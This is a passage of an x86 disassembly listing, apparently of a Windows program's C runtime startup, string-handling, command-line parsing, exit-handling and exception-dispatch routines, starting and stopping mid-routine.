loc_4027B1: ; CODE XREF: sub_402770+39�j
; sub_402770+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4027D1
test al, al
jz short loc_4027D1
inc edx
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027D1: ; CODE XREF: sub_402770+58�j
; sub_402770+5C�j
mov ebx, edx
loc_4027D3: ; CODE XREF: sub_402770+81�j
mov al, [edx]
test al, al
jz short loc_4027F7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027F3
inc edx
jmp short loc_4027D3
; ---------------------------------------------------------------------------
loc_4027F3: ; CODE XREF: sub_402770+7E�j
and byte ptr [edx], 0
inc edx
loc_4027F7: ; CODE XREF: sub_402770+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_4070CC, edx
and eax, ebx
pop ebx
leave
retn
sub_402770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401B59+E9�p
; sub_401B59+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402881
sub_402810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_401F4B+15D�p
; sub_401F4B+16C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40283C
loc_40282D: ; CODE XREF: sub_402820+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40286F
test ecx, 3
jnz short loc_40282D
loc_40283C: ; CODE XREF: sub_402820+B�j
; sub_402820+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40283C
mov eax, [ecx-4]
test al, al
jz short loc_40287E
test ah, ah
jz short loc_402879
test eax, 0FF0000h
jz short loc_402874
test eax, 0FF000000h
jz short loc_40286F
jmp short loc_40283C
; ---------------------------------------------------------------------------
loc_40286F: ; CODE XREF: sub_402820+12�j
; sub_402820+4B�j
lea edi, [ecx-1]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402874: ; CODE XREF: sub_402820+44�j
lea edi, [ecx-2]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_402879: ; CODE XREF: sub_402820+3D�j
lea edi, [ecx-3]
jmp short loc_402881
; ---------------------------------------------------------------------------
loc_40287E: ; CODE XREF: sub_402820+39�j
lea edi, [ecx-4]
loc_402881: ; CODE XREF: sub_402810+5�j
; sub_402820+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4028A6
loc_40288D: ; CODE XREF: sub_402820+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4028F8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40288D
jmp short loc_4028A6
; ---------------------------------------------------------------------------
loc_4028A1: ; CODE XREF: sub_402820+9E�j
; sub_402820+B8�j
mov [edi], edx
add edi, 4
loc_4028A6: ; CODE XREF: sub_402820+6B�j
; sub_402820+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4028A1
test dl, dl
jz short loc_4028F8
test dh, dh
jz short loc_4028EF
test edx, 0FF0000h
jz short loc_4028E2
test edx, 0FF000000h
jz short loc_4028DA
jmp short loc_4028A1
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402820+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028E2: ; CODE XREF: sub_402820+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028EF: ; CODE XREF: sub_402820+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028F8: ; CODE XREF: sub_402820+72�j
; sub_402820+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402820 endp
; =============== S U B R O U T I N E =======================================
sub_402900 proc near ; CODE XREF: sub_401E8B+19�p
arg_0 = dword ptr 4
cmp dword_406E7C, 1
jle short loc_40291A
push 107h
push [esp+4+arg_0]
call sub_402B3C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40291A: ; CODE XREF: sub_402900+7�j
mov eax, [esp+arg_0]
mov ecx, off_406C70
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402900 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405150
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4050D4 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_4070F4, edx
mov ecx, eax
and ecx, 0FFh
mov dword_4070F0, ecx
shl ecx, 8
add ecx, edx
mov dword_4070EC, ecx
shr eax, 10h
mov dword_4070E8, eax
xor esi, esi
push esi
call sub_403472
pop ecx
test eax, eax
jnz short loc_40299A
push 1Ch
call sub_402A49
pop ecx
loc_40299A: ; CODE XREF: .text:00402990�j
mov [ebp-4], esi
call sub_4032C7
call dword_4050D0 ; GetCommandLineA
mov dword_4075F8, eax
call sub_403195
mov dword_4070D0, eax
call sub_402F48
call sub_402E8F
call sub_402BB1
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4050CC ; GetStartupInfoA
call sub_402E37
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_4029E7
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4029EA
; ---------------------------------------------------------------------------
loc_4029E7: ; CODE XREF: .text:004029DF�j
push 0Ah
pop eax
loc_4029EA: ; CODE XREF: .text:004029E5�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4050C8 ; GetModuleHandleA
push eax
call sub_4020D9
mov [ebp-60h], eax
push eax
call sub_402BDE
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402CB3
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402BEF
; =============== S U B R O U T I N E =======================================
sub_402A24 proc near ; CODE XREF: sub_402E8F+4E�p
; sub_402E8F+7D�p ...
arg_0 = dword ptr 4
cmp dword_4070D8, 1
jnz short loc_402A32
call sub_403680
loc_402A32: ; CODE XREF: sub_402A24+7�j
push [esp+arg_0]
call sub_4036B9
push 0FFh
call off_406C60
pop ecx
pop ecx
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
sub_402A49 proc near ; CODE XREF: .text:00402994�p
arg_0 = dword ptr 4
cmp dword_4070D8, 1
jnz short loc_402A57
call sub_403680
loc_402A57: ; CODE XREF: sub_402A49+7�j
push [esp+arg_0]
call sub_4036B9
pop ecx
push 0FFh
call dword_4050D8 ; ExitProcess
retn
sub_402A49 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402A86
loc_402A70: ; CODE XREF: sub_402A86+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402A86
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402A86 proc near ; CODE XREF: sub_4026F0+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402A70 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_402AAB
loc_402A98: ; CODE XREF: sub_402A86+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402A70
test cl, cl
jz short loc_402AF4
test edx, 3
jnz short loc_402A98
loc_402AAB: ; CODE XREF: sub_402A86+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_402AB6: ; CODE XREF: sub_402A86+5B�j
; sub_402A86+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402AF8
and eax, 81010100h
jz short loc_402AB6
and eax, 1010100h
jnz short loc_402AF2
and esi, 80000000h
jnz short loc_402AB6
loc_402AF2: ; CODE XREF: sub_402A86+62�j
; sub_402A86+7B�j ...
pop esi
pop edi
loc_402AF4: ; CODE XREF: sub_402A86+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402AF8: ; CODE XREF: sub_402A86+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402B35
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B2E
test ah, ah
jz short loc_402AF2
shr eax, 10h
cmp al, bl
jz short loc_402B27
test al, al
jz short loc_402AF2
cmp ah, bl
jz short loc_402B20
test ah, ah
jz short loc_402AF2
jmp short loc_402AB6
; ---------------------------------------------------------------------------
loc_402B20: ; CODE XREF: sub_402A86+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B27: ; CODE XREF: sub_402A86+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B2E: ; CODE XREF: sub_402A86+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402B35: ; CODE XREF: sub_402A86+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B3C proc near ; CODE XREF: sub_402900+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402B5A
mov ecx, off_406C70
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402BAC
; ---------------------------------------------------------------------------
loc_402B5A: ; CODE XREF: sub_402B3C+10�j
mov ecx, eax
push esi
mov esi, off_406C70
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402B7F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402B88
; ---------------------------------------------------------------------------
loc_402B7F: ; CODE XREF: sub_402B3C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402B88: ; CODE XREF: sub_402B3C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40380C
add esp, 1Ch
test eax, eax
jnz short loc_402BA8
leave
retn
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402B3C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402BAC: ; CODE XREF: sub_402B3C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402B3C endp
; =============== S U B R O U T I N E =======================================
sub_402BB1 proc near ; CODE XREF: .text:004029C1�p
mov eax, dword_4075F4
test eax, eax
jz short loc_402BBC
call eax ; dword_4075F4
loc_402BBC: ; CODE XREF: sub_402BB1+7�j
push offset dword_406010
push offset dword_406008
call sub_402C99
push offset dword_406004
push offset dword_406000
call sub_402C99
add esp, 10h
retn
sub_402BB1 endp
; =============== S U B R O U T I N E =======================================
sub_402BDE proc near ; CODE XREF: .text:00402A00�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BDE endp
; =============== S U B R O U T I N E =======================================
sub_402BEF proc near ; CODE XREF: .text:00402A1F�p
; sub_402A24+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402C00
add esp, 0Ch
retn
sub_402BEF endp
; =============== S U B R O U T I N E =======================================
sub_402C00 proc near ; CODE XREF: sub_402BDE+8�p
; sub_402BEF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_407124, edi
jnz short loc_402C1D
push [esp+4+arg_0]
call dword_4050E0 ; GetCurrentProcess
push eax
call dword_4050DC ; TerminateProcess
loc_402C1D: ; CODE XREF: sub_402C00+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_407120, edi
mov byte_40711C, bl
jnz short loc_402C71
mov eax, dword_4075F0
test eax, eax
jz short loc_402C60
mov ecx, dword_4075EC
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402C5F
loc_402C4C: ; CODE XREF: sub_402C00+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402C54
call eax
loc_402C54: ; CODE XREF: sub_402C00+50�j
sub esi, 4
cmp esi, dword_4075F0
jnb short loc_402C4C
loc_402C5F: ; CODE XREF: sub_402C00+4A�j
pop esi
loc_402C60: ; CODE XREF: sub_402C00+3C�j
push offset dword_406018
push offset dword_406014
call sub_402C99
pop ecx
pop ecx
loc_402C71: ; CODE XREF: sub_402C00+33�j
push offset dword_406020
push offset dword_40601C
call sub_402C99
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402C97
push [esp+4+arg_0]
mov dword_407124, edi
call dword_4050D8 ; ExitProcess
loc_402C97: ; CODE XREF: sub_402C00+85�j
pop edi
retn
sub_402C00 endp
; =============== S U B R O U T I N E =======================================
sub_402C99 proc near ; CODE XREF: sub_402BB1+15�p
; sub_402BB1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402C9E: ; CODE XREF: sub_402C99+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402CB1
mov eax, [esi]
test eax, eax
jz short loc_402CAC
call eax
loc_402CAC: ; CODE XREF: sub_402C99+F�j
add esi, 4
jmp short loc_402C9E
; ---------------------------------------------------------------------------
loc_402CB1: ; CODE XREF: sub_402C99+9�j
pop esi
retn
sub_402C99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CB3 proc near ; CODE XREF: .text:00402A11�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402DF4
test eax, eax
pop ecx
jz loc_402DE8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402DE8
cmp ebx, 5
jnz short loc_402CE4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402DF1
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402CB3+23�j
cmp ebx, 1
jz loc_402DE3
mov ecx, dword_407128
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_407128, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402DD3
mov ecx, dword_406F00
mov edx, dword_406F04
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402D33
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406E90h[esi*4]
loc_402D2A: ; CODE XREF: sub_402CB3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402D2A
loc_402D33: ; CODE XREF: sub_402CB3+69�j
mov eax, [eax]
mov esi, dword_406F0C
cmp eax, 0C000008Eh
jnz short loc_402D4E
mov dword_406F0C, 83h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D4E: ; CODE XREF: sub_402CB3+8D�j
cmp eax, 0C0000090h
jnz short loc_402D61
mov dword_406F0C, 81h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D61: ; CODE XREF: sub_402CB3+A0�j
cmp eax, 0C0000091h
jnz short loc_402D74
mov dword_406F0C, 84h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D74: ; CODE XREF: sub_402CB3+B3�j
cmp eax, 0C0000093h
jnz short loc_402D87
mov dword_406F0C, 85h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402CB3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402D9A
mov dword_406F0C, 82h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402D9A: ; CODE XREF: sub_402CB3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402DAD
mov dword_406F0C, 86h
jmp short loc_402DBE
; ---------------------------------------------------------------------------
loc_402DAD: ; CODE XREF: sub_402CB3+EC�j
cmp eax, 0C0000092h
jnz short loc_402DBE
mov dword_406F0C, 8Ah
loc_402DBE: ; CODE XREF: sub_402CB3+99�j
; sub_402CB3+AC�j ...
push dword_406F0C
push 8
call ebx ; _lread
pop ecx
mov dword_406F0C, esi
pop ecx
pop esi
jmp short loc_402DDB
; ---------------------------------------------------------------------------
loc_402DD3: ; CODE XREF: sub_402CB3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _lread
pop ecx
loc_402DDB: ; CODE XREF: sub_402CB3+11E�j
mov eax, [ebp+arg_0]
mov dword_407128, eax
loc_402DE3: ; CODE XREF: sub_402CB3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402DF1
; ---------------------------------------------------------------------------
loc_402DE8: ; CODE XREF: sub_402CB3+F�j
; sub_402CB3+1A�j
push [ebp+arg_4]
call dword_4050E4 ; UnhandledExceptionFilter
loc_402DF1: ; CODE XREF: sub_402CB3+2C�j
; sub_402CB3+133�j
pop ebx
pop ebp
retn
sub_402CB3 endp
; =============== S U B R O U T I N E =======================================
sub_402DF4 proc near ; CODE XREF: sub_402CB3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406F08
cmp dword_406E88, edx
push esi
mov eax, offset dword_406E88
jz short loc_402E21
lea esi, [ecx+ecx*2]
lea esi, ds:406E88h[esi*4]
loc_402E16: ; CODE XREF: sub_402DF4+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402E21
cmp [eax], edx
jnz short loc_402E16
loc_402E21: ; CODE XREF: sub_402DF4+16�j
; sub_402DF4+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406E88h[ecx*4]
cmp eax, ecx
jnb short loc_402E34
cmp [eax], edx
jz short locret_402E36
loc_402E34: ; CODE XREF: sub_402DF4+3A�j
xor eax, eax
locret_402E36: ; CODE XREF: sub_402DF4+3E�j
retn
sub_402DF4 endp
; =============== S U B R O U T I N E =======================================
sub_402E37 proc near ; CODE XREF: .text:004029D3�p
cmp dword_4075E8, 0
jnz short loc_402E45
call sub_403D5B
loc_402E45: ; CODE XREF: sub_402E37+7�j
push esi
mov esi, dword_4075F8
mov al, [esi]
cmp al, 22h
jnz short loc_402E77
loc_402E52: ; CODE XREF: sub_402E37+33�j
; sub_402E37+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402E6F
test al, al
jz short loc_402E6F
movzx eax, al
push eax
call sub_403955
test eax, eax
pop ecx
jz short loc_402E52
inc esi
jmp short loc_402E52
; ---------------------------------------------------------------------------
loc_402E6F: ; CODE XREF: sub_402E37+21�j
; sub_402E37+25�j
cmp byte ptr [esi], 22h
jnz short loc_402E81
loc_402E74: ; CODE XREF: sub_402E37+52�j
inc esi
jmp short loc_402E81
; ---------------------------------------------------------------------------
loc_402E77: ; CODE XREF: sub_402E37+19�j
cmp al, 20h
jbe short loc_402E81
loc_402E7B: ; CODE XREF: sub_402E37+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402E7B
loc_402E81: ; CODE XREF: sub_402E37+3B�j
; sub_402E37+3E�j ...
mov al, [esi]
test al, al
jz short loc_402E8B
cmp al, 20h
jbe short loc_402E74
loc_402E8B: ; CODE XREF: sub_402E37+4E�j
mov eax, esi
pop esi
retn
sub_402E37 endp
; =============== S U B R O U T I N E =======================================
sub_402E8F proc near ; CODE XREF: .text:004029BC�p
push ebx
xor ebx, ebx
cmp dword_4075E8, ebx
push esi
push edi
jnz short loc_402EA1
call sub_403D5B
loc_402EA1: ; CODE XREF: sub_402E8F+B�j
mov esi, dword_4070D0
xor edi, edi
loc_402EA9: ; CODE XREF: sub_402E8F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402EC1
cmp al, 3Dh
jz short loc_402EB4
inc edi
loc_402EB4: ; CODE XREF: sub_402E8F+22�j
push esi
call sub_402300
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402EA9
; ---------------------------------------------------------------------------
loc_402EC1: ; CODE XREF: sub_402E8F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_407104, esi
jnz short loc_402EE3
push 9
call sub_402A24
pop ecx
loc_402EE3: ; CODE XREF: sub_402E8F+4A�j
mov edi, dword_4070D0
cmp [edi], bl
jz short loc_402F26
push ebp
loc_402EEE: ; CODE XREF: sub_402E8F+94�j
push edi
call sub_402300
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402F1F
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402F12
push 9
call sub_402A24
pop ecx
loc_402F12: ; CODE XREF: sub_402E8F+79�j
push edi
push dword ptr [esi]
call sub_402810
pop ecx
add esi, 4
pop ecx
loc_402F1F: ; CODE XREF: sub_402E8F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402EEE
pop ebp
loc_402F26: ; CODE XREF: sub_402E8F+5C�j
push dword_4070D0
call sub_403D77
pop ecx
mov dword_4070D0, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_4075E4, 1
pop ebx
retn
sub_402E8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F48 proc near ; CODE XREF: .text:004029B7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_4075E8, ebx
push esi
push edi
jnz short loc_402F5F
call sub_403D5B
loc_402F5F: ; CODE XREF: sub_402F48+10�j
mov esi, offset dword_40712C
push 104h
push esi
push ebx
call dword_405038 ; GetModuleFileNameA
mov eax, dword_4075F8
mov dword_407114, esi
mov edi, esi
cmp [eax], bl
jz short loc_402F84
mov edi, eax
loc_402F84: ; CODE XREF: sub_402F48+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402FE1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403DA6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402FB4
push 8
call sub_402A24
pop ecx
loc_402FB4: ; CODE XREF: sub_402F48+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402FE1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_4070FC, esi
pop edi
pop esi
mov dword_4070F8, eax
pop ebx
leave
retn
sub_402F48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FE1 proc near ; CODE XREF: sub_402F48+47�p
; sub_402F48+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_40300B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_40300B: ; CODE XREF: sub_402FE1+20�j
cmp byte ptr [eax], 22h
jnz short loc_403054
loc_403010: ; CODE XREF: sub_402FE1+58�j
; sub_402FE1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_403042
test dl, dl
jz short loc_403042
movzx edx, dl
test byte_4073C1[edx], 4
jz short loc_403035
inc dword ptr [ecx]
test esi, esi
jz short loc_403035
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_403035: ; CODE XREF: sub_402FE1+46�j
; sub_402FE1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_403010
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_403042: ; CODE XREF: sub_402FE1+36�j
; sub_402FE1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40304C
and byte ptr [esi], 0
inc esi
loc_40304C: ; CODE XREF: sub_402FE1+65�j
cmp byte ptr [eax], 22h
jnz short loc_403097
inc eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_403054: ; CODE XREF: sub_402FE1+2D�j
; sub_402FE1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40305F
mov dl, [eax]
mov [esi], dl
inc esi
loc_40305F: ; CODE XREF: sub_402FE1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_4073C1[ebx], 4
jz short loc_40307A
inc dword ptr [ecx]
test esi, esi
jz short loc_403079
mov bl, [eax]
mov [esi], bl
inc esi
loc_403079: ; CODE XREF: sub_402FE1+91�j
inc eax
loc_40307A: ; CODE XREF: sub_402FE1+8B�j
cmp dl, 20h
jz short loc_403088
test dl, dl
jz short loc_40308C
cmp dl, 9
jnz short loc_403054
loc_403088: ; CODE XREF: sub_402FE1+9C�j
test dl, dl
jnz short loc_40308F
loc_40308C: ; CODE XREF: sub_402FE1+A0�j
dec eax
jmp short loc_403097
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_402FE1+A9�j
test esi, esi
jz short loc_403097
and byte ptr [esi-1], 0
loc_403097: ; CODE XREF: sub_402FE1+6E�j
; sub_402FE1+71�j ...
and [ebp+arg_10], 0
loc_40309B: ; CODE XREF: sub_402FE1+19E�j
cmp byte ptr [eax], 0
jz loc_403184
loc_4030A4: ; CODE XREF: sub_402FE1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4030B0
cmp dl, 9
jnz short loc_4030B3
loc_4030B0: ; CODE XREF: sub_402FE1+C8�j
inc eax
jmp short loc_4030A4
; ---------------------------------------------------------------------------
loc_4030B3: ; CODE XREF: sub_402FE1+CD�j
cmp byte ptr [eax], 0
jz loc_403184
test edi, edi
jz short loc_4030C8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_4030C8: ; CODE XREF: sub_402FE1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_4030CD: ; CODE XREF: sub_402FE1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_4030D6: ; CODE XREF: sub_402FE1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_4030DF
inc eax
inc ebx
jmp short loc_4030D6
; ---------------------------------------------------------------------------
loc_4030DF: ; CODE XREF: sub_402FE1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403110
test bl, 1
jnz short loc_40310E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4030FD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4030FD
mov eax, edx
jmp short loc_403100
; ---------------------------------------------------------------------------
loc_4030FD: ; CODE XREF: sub_402FE1+10D�j
; sub_402FE1+116�j
mov [ebp+arg_0], edi
loc_403100: ; CODE XREF: sub_402FE1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40310E: ; CODE XREF: sub_402FE1+106�j
shr ebx, 1
loc_403110: ; CODE XREF: sub_402FE1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403125
inc ebx
loc_403118: ; CODE XREF: sub_402FE1+142�j
test esi, esi
jz short loc_403120
mov byte ptr [esi], 5Ch
inc esi
loc_403120: ; CODE XREF: sub_402FE1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403118
loc_403125: ; CODE XREF: sub_402FE1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403175
cmp [ebp+arg_10], 0
jnz short loc_40313B
cmp dl, 20h
jz short loc_403175
cmp dl, 9
jz short loc_403175
loc_40313B: ; CODE XREF: sub_402FE1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40316F
test esi, esi
jz short loc_40315E
movzx ebx, dl
test byte_4073C1[ebx], 4
jz short loc_403157
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403157: ; CODE XREF: sub_402FE1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40316D
; ---------------------------------------------------------------------------
loc_40315E: ; CODE XREF: sub_402FE1+162�j
movzx edx, dl
test byte_4073C1[edx], 4
jz short loc_40316D
inc eax
inc dword ptr [ecx]
loc_40316D: ; CODE XREF: sub_402FE1+17B�j
; sub_402FE1+187�j
inc dword ptr [ecx]
loc_40316F: ; CODE XREF: sub_402FE1+15E�j
inc eax
jmp loc_4030CD
; ---------------------------------------------------------------------------
